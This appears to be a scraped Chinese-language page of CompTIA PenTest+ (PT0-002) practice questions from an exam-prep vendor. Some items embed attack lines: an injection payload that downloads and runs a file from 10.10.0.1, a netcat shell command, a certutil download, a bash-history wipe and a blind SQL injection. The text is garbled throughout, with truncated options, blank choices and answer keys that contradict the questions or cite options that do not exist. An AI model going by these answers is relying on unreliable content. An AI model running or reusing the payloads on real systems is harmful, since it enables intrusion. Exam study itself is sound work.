不想錯過任何事?

通過認證考試的技巧

最新考試新聞和折扣資訊

由我們的專家策劃和更新

是的,請向我發送時事通訊

CompTIA PT0-002 考試成功:模擬測試和學習資源, CompTIA PenTest+ 認證 | SPOTO

使用我們的模擬測試和學習資源,爲成功通過 CompTIA PenTest+ (PT0-002) 認證考試做好準備。備考的最佳方法是練習最新的考試試題。我們的學習資料包括模擬測試、樣題、考試試卷以及考試問題和答案,旨在幫助您取得成功。CompTIA PenTest+ 認證是負責滲透測試和漏洞管理的網絡安全專業人員的理想選擇。通過訪問我們的模擬考試和考試模擬器,您可以模擬真實的考試條件,增強您的信心。利用我們的考試材料和考試答案,加強您對 PT0-002 考試的理解和準備。利用我們全面的學習資源和模擬考試,滿懷信心地備考並取得考試成功。

參加其他線上考試
問題 #1
一名專業安全人員希望通過向監聽 TCP 3011 端口的專有服務發送無效數據包來測試物聯網設備。以下哪種方法可以讓專業安全人員使用任意數字輕鬆地以編程方式操縱 TCP 報頭長度和校驗和,並觀察專有服務的響應情況?
A. map
B. tcpdump
C. capy
D. ping3
查看答案
正確答案: C
問題 #2
一名滲透測試人員在一臺默認配置的 Windows 服務器上獲得了一個低權限 shell,現在他想探索利用錯誤配置的服務權限的能力。以下哪些命令可以幫助測試人員開始這一過程?
A. certutil -urlcache -split -f http://192
B. powershell (New-Object System
C. chtasks /query /fo LIST /v | find /I "下一次運行時間:"
D. get http://192
查看答案
正確答案: A
問題 #3
滲透測試人員獲得系統訪問權限並建立持久性,然後運行以下命令: cat /dev/null > temp touch -r .bash_history temp mv temp .bash_history 測試人員最有可能執行以下哪項操作?
A. Bash 歷史記錄重定向到 /dev/null
B. 製用戶的 Bash 歷史記錄,以便進一步查詢
C. 過清除 Bash 歷史記錄來掩蓋痕跡
D. 系統中製作誘餌文件,迷惑事件響應者
查看答案
正確答案: A
問題 #4
一名安全工程師在網絡上發現了一臺新服務器,他想掃描這臺主機,以確定它運行的是否是經批准的 Linux 版本和已打補丁的 Apache 版本。下面哪個命令可以完成這項任務?
A. nmap -f -sV -p80 192
B. nmap -sS -sL -p80 192
C. map -A -T4 -p80 192
D. map -O -v -p80 192
查看答案
正確答案: A
問題 #5
給出以下代碼: 以下哪些是防範此類攻擊的最佳方法?(選擇兩項)。
A. 絡應用防火牆
B. 數化查詢
C. 輸出編碼
D. 會話令牌
E. 入驗證
F. ase64 編碼
查看答案
正確答案: BE
問題 #6
一名滲透測試人員最近完成了對企業環境中核心網絡設備安全性的審查。主要發現如下:(cid:127) 截獲了進入網絡設備的以下請求:GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization:Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk (cid:127) 網絡管理接口可用。
A. 化密碼複雜性要求。
B. 用或升級 SSH 守護進程。
C. 用 HTTP/301 重定向配置。
D. 爲管理創建帶外網絡。
E. 用更好的驗證方法
F. 消網絡管理和控制接口。
查看答案
正確答案: CD
問題 #7
一家公司聘請了一名滲透測試人員對其員工進行社交工程測試。雖然測試人員在公司網站上沒有找到任何員工的電話號碼,但測試人員了解到完整的電話號碼目錄幾個月前在網站上公布過。滲透測試人員應在以下哪個地方查找員工的電話號碼?
A. 絡檔案
B. itHub
C. 件元數據
D. 下論壇
查看答案
正確答案: A
問題 #8
一位高管在旅行時需要使用 Wi-Fi 連接到公司的服務器。在尋找可用的 Wi-Fi 連接時,該高管注意到一家連鎖酒店有一個可用的接入點,但該高管下榻的酒店卻沒有這個接入點。該高管最有可能遇到以下哪種攻擊?
A. 據修改
B. 大
C. 帶門戶網站
D. 惡的雙胞胎
查看答案
正確答案: D
問題 #9
在一個未受保護的網絡文件庫中,滲透測試人員發現了一個包含明文用戶名和密碼的文本文件,以及一個包含 50 名員工數據(包括全名、角色和序列號)的電子表格。測試人員發現文本文件中的部分密碼格式如下測試人員發現文本文件中的某些密碼格式如下:<姓名-序列號>。
A. 建自定義密碼字典,爲密碼噴射測試做準備。
B. 議使用密碼管理器/保險庫而不是文本文件來安全地存儲密碼。
C. 議在所有系統和應用程序中配置密碼複雜性規則。
D. 滲透測試報告中將未受保護的文件庫記錄爲一項發現。
查看答案
正確答案: D
問題 #10
滲透測試人員受聘審查無線安全。測試人員部署了一個惡意無線接入點,模仿目標企業 WiFi 的配置。現在,滲透測試員想嘗試強制附近的無線站連接到惡意 AP。接下來,測試人員應採取以下哪些步驟?
A. 臺站發送取消認證幀。
B. 所有 2
C. 惡意 AP 設置爲在動態頻率選擇信道內廣播。
D. 改惡意 AP 配置,使其不使用預共享密鑰。
查看答案
正確答案: B
問題 #11
一名滲透測試人員在進行滲透測試時,發現網絡流量不再能到達客戶的 IP 地址。測試人員後來發現 SOC 對滲透測試人員的 IP 地址使用了 sinkholing。以下哪項最恰當地描述了所發生的情況?
A. 透測試人員測試了錯誤的資產
B. 划過程未能確保通知所有小組
C. 戶尚未準備好開始評估
D. 透測試人員的聯繫信息有誤
查看答案
正確答案: C
問題 #12
以下哪項是與直接連接到互聯網的 loT 設備相關的最常見漏洞?物聯網設備在出廠時通常帶有默認密碼,這些密碼很容易被發現並廣爲人知。許多用戶沒有更改這些默認憑據,導致設備容易受到未經授權的訪問。這個問題是與直接連接到互聯網的物聯網設備相關的最常見漏洞之一。攻擊者可以利用這些默認密碼來獲取共用權限。
A. 支持的操作系統。
B. 易受 DDoS 攻擊。
C. 法聯網。
D. 在默認密碼
查看答案
正確答案: D
問題 #13
一名滲透測試人員利用服務器上的一個漏洞,遠程運行了一個有效載荷以獲取 shell。然而,連接沒有建立,有效載荷的執行也沒有顯示錯誤。滲透測試人員懷疑是 IPS 或下一代防火牆等網絡設備中斷了連接。以下哪些有效負載最有可能成功建立 shell?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
查看答案
正確答案: D
問題 #14
在 Python 中,下列哪些表達式會將變量 val 增加一個(選擇兩個。)
A. al++
B. val
C. al=(val+1)
D. +val
E. al=val++
F. val+=1
查看答案
正確答案: C
問題 #15
以下哪些網絡應用程序安全風險是 OWASP Top 10 v2017 的一部分?(請選擇兩項)。
A. 衝區溢出
B. 站腳本
C. 族條件攻擊
D. 日攻擊
E. 射缺陷
F. 索軟件攻擊
查看答案
正確答案: C
問題 #16
一名滲透測試人員獲得了一臺基於 Linux 的文件服務器的 root 訪問權限,並希望在重啓後保持持久性。以下哪種技術能最好地支持這一目標?
A. 建一次性 systemd 服務以建立反向 shell。
B. 取 /etc/shadow 並強行輸入 root 密碼。
C. 行 nc -e /bin/sh<
D. 向移動在 LDAP 上創建用戶帳戶
查看答案
正確答案: B
問題 #17
以下哪項最能解釋爲什麼溝通是滲透測試的重要階段?溝通是滲透測試的重要階段,可確保所有相關方了解測試的進展、發現以及對業務運營的任何潛在影響。討論態勢感知包括分享有關安全態勢、發現的任何漏洞和潛在風險的實時見解。這使企業能夠做出明智的決策,及時降低風險,並確保安全。
A. 討論態勢感知。
B. 與緊急聯繫人建立良好關係。
C. 解釋數據銷毀程序
D. 確保未來評估的可能性。
查看答案
正確答案: A
問題 #18
滲透測試人員正在測試一個由公共雲提供商託管的網絡應用程序。測試人員能夠查詢提供商的元數據,並獲取實例用於驗證自身身份的憑證。測試人員利用了以下哪些漏洞?
A. 站請求僞造
B. 務器端請求僞造
C. 程文件包含
D. 入地方法規
查看答案
正確答案: B
問題 #19
滲透測試人員進行了一次發現掃描,掃描結果如下:以下哪個命令會生成上述結果,並將其轉換爲活動主機列表以供進一步分析?
A. nmap -oG list
B. nmap -sn 192
C. map --open 192
D. map -o 192
查看答案
正確答案: AC
問題 #20
以下哪項是對 OWASP Top 10 的最佳描述?
A. 絡應用程序最關鍵的風險
B. 絡應用程序的所有風險清單
C. 重要性排序的風險
D. 絡應用程序安全標準
E. 險治理和合規框架
F. 帕奇漏洞清單
查看答案
正確答案: D
問題 #21
某客戶希望安全評估公司對其熱點網站進行滲透測試。測試的目的是確定防止業務連續性中斷的防禦措施的有效性。在開始此類評估之前,以下哪項是最重要的行動?
A. 保客戶已籤署 SOW。
B. 證客戶端是否允許網絡訪問熱點。
C. 定故障轉移環境是否依賴於客戶機不擁有的資源。
D. 客戶建立溝通和升級程序。
查看答案
正確答案: A
問題 #22
一名滲透測試人員在與客戶接洽之前正在審閱以下 SOW:"網絡圖、邏輯和物理資產清單以及員工姓名應視爲客戶機密。任務完成後,滲透測試人員將通過加密協議向客戶的首席信息安全官 (CISO) 提交調查結果,隨後以安全的方式刪除所有調查結果。根據 SOW 中的信息,下列行爲中的哪一項是
A. 用不向公衆或客戶提供的專有滲透測試工具進行審計和檢查
B. 用公用密鑰加密技術,確保在參與工作完成後向首席信息安全官提交調查結果
C. 能與客戶分享客戶架構中存在的關鍵漏洞,以安撫客戶的高級領導團隊
D. 過共享客戶的公共 IP 地址,在地下黑客論壇上尋求參與幫助
E. 用基於軟件的清除工具,從滲透測試人員的筆記本電腦上清除客戶的調查結果
F. SOW 保留在滲透測試人員的公司內部,以備將來使用,這樣銷售團隊就能規劃未來的業務約定
查看答案
正確答案: CD
問題 #23
對裝有 SCADA 設備的環境進行滲透測試會帶來額外的安全風險,因爲:
A. 設備會產生更多熱量,消耗更多電能。
B. 設備已過時,無法再更換。
C. 議更難理解。
D. 備可能會對物理世界造成影響。
查看答案
正確答案: D
問題 #24
滲透測試人員使用 dirb 工具掃描網絡服務器後得到以下結果: ... 生成字數:4612 ---- 掃描 URL:http://10.2.10.13/ ---- + http://10.2.10.13/about (CODE:200|SIZE:1520) + http://10.2.10.13/home.html (CODE:200|SIZE:214) + http://10.2.10.13/index.html (CODE:200|SIZE:214) + http://10.2.10.13/info (CODE:200|SIZE:214) ...下載:4612 - 找到:4 下列哪個元素最有可能包含對滲透測試人員有用的信息?
A. index
B. about C
查看答案
正確答案: AC
問題 #25
一名滲透測試人員最近完成了對企業環境中核心網絡設備安全性的審查。主要發現如下:攔截到的網絡設備請求如下:GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:31.0)Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization:Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk 網絡管理接口可在生產網絡上使用。
A. 化密碼複雜性要求。
B. 用或升級 SSH 守護進程。
C. 用 HTTP/301 重定向配置。
D. 管理創建帶外網絡。
E. 用更好的驗證方法
F. 消網絡管理和控制接口。
查看答案
正確答案: AE
問題 #26
一名滲透測試人員編寫了以下腳本,準備在一次任務中使用:該腳本將執行以下哪些操作?
A. 找開放的端口。
B. 聽反向炮彈。
C. 圖淹沒開放的端口。
D. 創建加密隧道。
查看答案
正確答案: A
問題 #27
滲透測試人員正在測試一個網站上發現的搜索表單的輸入驗證。以下哪個字符是測試網站漏洞的最佳選項?
A. 逗號
B. 破折號
C. 引號
D. 號
查看答案
正確答案: C
問題 #28
滲透測試人員使用以下有效載荷成功利用了一個漏洞:IF (1=1) WAIT FOR DELAY '0:0:15' 下列哪種操作最能緩解這種類型的攻擊?滲透測試人員使用的有效載荷是一種盲 SQL 注入攻擊,如果條件爲真,會將數據庫的響應延遲 15 秒。通過提出一系列真假問題,可從數據庫中提取信息。爲防止此類攻擊,最佳做法是
A. 密碼加密
B. 數化查詢
C. 碼輸出。
D. 對 HTML 進行消毒。
查看答案
正確答案: B
問題 #29
一名滲透測試人員希望在不被發現的情況下進行偵察。以下哪些活動被發現的幾率最小?(選擇兩項)。
A. 源研究
B.
C.
D.
查看答案
正確答案: B
問題 #30
一家新成立的安全公司正在接待第一個客戶。客戶只允許在周末進行測試,周一上午需要結果。然而,評估團隊直到周一才如願進入環境。在評估開始之前,安全公司應該獲取以下哪項內容?
A. 籤署的工作說明書
B. 確的用戶賬戶和相關密碼 C
查看答案
正確答案: B
問題 #31
輸出結果如下User-agent:* Disallow:/author/ Disallow:/xmlrpc.php Disallow:/wp-admin Disallow:/page/ 在以下哪項活動中最有可能獲得此輸出?
A. 站搜索
B. 站克隆
C. 枚舉
D. URL 枚舉
查看答案
正確答案: CF
問題 #32
滲透測試人員在爲一家客戶機構進行評估時,發現其關鍵服務器上安裝了大量過時的軟件包版本。以下哪項最能緩解這一問題?緩解這一問題的最佳方法是實施補丁程序和變更控制程序,這些程序涉及對軟件包應用更新或修復,以解決漏洞、錯誤或性能問題,並管理或記錄對軟件包所做的變更。
A. 實施修補和變更控制計劃。
B. 修訂用於執行系統更新的客戶端腳本
C. 客戶的系統管理員提供補救培訓。
D. 質量保證批准之前,不得修補系統。
查看答案
正確答案: A
問題 #33
一名滲透測試人員正準備爲客戶開展活動,要求儘量減少對公司運營的幹擾。以下哪些工具屬於被動偵察工具?(請選擇兩項) A. Wireshark
A.
B.
C.
D.
E.
查看答案
正確答案: AC
問題 #34
將字符串值附加到另一個字符串上被稱爲 "附加":
A. 編制
B. 連接
C. 接
D. 連接
查看答案
正確答案: A
問題 #35
某公司向員工發送了一封模擬網絡釣魚攻擊的電子郵件,其中包含一個模仿企業 SSO 門戶網站的鏈接。收到電子郵件的員工中有 80% 點擊了鏈接,並在假冒網站上提供了他們的企業憑據。以下哪項建議能最好地解決這種情況?
A. 所有用戶實施經常性的網絡安全意識教育計劃。
B. 所有企業應用程序上實施多因素身份驗證。
C. 過在企業代理中定義未經批准的網站列表,限制員工瀏覽網頁。
D. 實施電子郵件安全網關,阻止電子郵件通信中的垃圾郵件和惡意軟件。
查看答案
正確答案: A
問題 #36
一名滲透測試人員利用漏洞訪問了一個系統。以下是使用的代碼片段: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}- c${IFS}'cd${IFS}/ tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${I FS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" 滲透測試人員在參與後應運行以下哪個命令?
A. grep -v apache ~/
B. rm -rf /tmp/apache C
查看答案
正確答案: D
問題 #37
滲透測試小組正在進行物理滲透測試,以進入一棟大樓。以下哪項是滲透測試人員應隨身攜帶參與文件副本的原因?
A. 爲原件丟失時的備份
B. 導他們通過大樓入口
C. 與客戶驗證賬單信息
D. 爲萬一被發現的證據
查看答案
正確答案: A
問題 #38
一家公司聘請了一個滲透測試小組來審查一家製造廠的網絡物理系統。小組立即發現監控系統和 PLC 都連接到了公司內網。如果滲透測試小組做出以下哪項假設,最有可能成立?
A. LC 不會執行通過網絡注入的命令。
B. 控器和控制器默認處於不同的虛擬網絡中。
C. 制器不會驗證命令的來源。
D. 控系統會檢測到惡意注入的代碼/命令。
查看答案
正確答案: C
問題 #39
一名正在進行安全評估的滲透測試人員發現,網絡罪犯正在積極利用一個關鍵漏洞。測試人員下一步應該做以下哪項工作?
A. 繫主要聯繫人
B. 法擊倒攻擊者
C. 即呼叫執法人員
D. 集適當證據並添加到最終報告中
查看答案
正確答案: CE
問題 #40
滲透測試人員正在枚舉共享,並收到以下輸出: 滲透測試人員下一步應該枚舉下列哪項?顯示的輸出是使用 smbclient 或 enum4linux 等工具在使用 SMB(服務器消息塊)協議的系統上列出共享目錄時可能看到的典型輸出。以下是已發現的共享資源的簡要概述: 1. print$ - 該共享一般用於打印機驅動程序。 2. home - 可能是用戶的主目錄
A. ev
B. rint$
C. ome
D. otes
查看答案
正確答案: A
問題 #41
滲透測試人員在一次未知環境測試中運行了 ping -A 命令,結果返回了一個 128 TTL 數據包。以下哪個操作系統最有可能返回這種類型的數據包?
A. 口
B. 果
C. inux
D. ndroid
查看答案
正確答案: A
問題 #42
以下哪個文件描述了滲透測試人員的具體活動、交付成果和時間表?
A. DA
B. SA
C. OW
D. 諒解備忘錄
查看答案
正確答案: C
問題 #43
一名正在進行公司要求的評估的滲透測試人員希望使用雙重標記向另一個系統發送流量。以下哪種技術能最好地實現這一目標?
A. 隆 RFID
B. FID 標籤
C. 元標記
D. 籤嵌套
查看答案
正確答案: D
問題 #44
以下哪項可用於存儲字母數字數據,將其輸入腳本或程序,作爲滲透測試工具的輸入?
A. 典
B. 錄
C. ymlink
D. 錄
E. or 循環
查看答案
正確答案: A
問題 #45
從攻擊機器的日誌中提取了以下 PowerShell 代碼段:滲透測試人員希望識別一個數組的存在。以下哪個行號可以定義數組?
A. 8 行
B. 13 行
C. 19 行
D. 20 行
查看答案
正確答案: A
問題 #46
在應用程序代碼中使用第三方開放源代碼庫的最大顧慮是什麼?(請選擇兩項)。
A. 書館可能易受攻擊
B.
C.
D.
查看答案
正確答案: B
問題 #47
在收到間歇性連接問題的報告後,一名顧問正在審查以下輸出:?(192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ?(192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet] ?(192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet] ?(192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet] ?(192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ?(192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet] ?(224.0.0.251) at 01:02:5e:7
A. 絡上的一臺設備的 IP 地址位於錯誤的子網中。
B. 用錯誤的組播組啓動了組播會話。
C. RP泛洪攻擊是利用廣播地址執行 DDoS。
D. 絡上的一臺設備毒害了 ARP 緩存。
查看答案
正確答案: AE

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意:請確保您的電子郵件 ID 和 Whatsapp 有效,以便您獲得正確的考試結果。

電子郵件:
WhatsApp/電話號碼:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.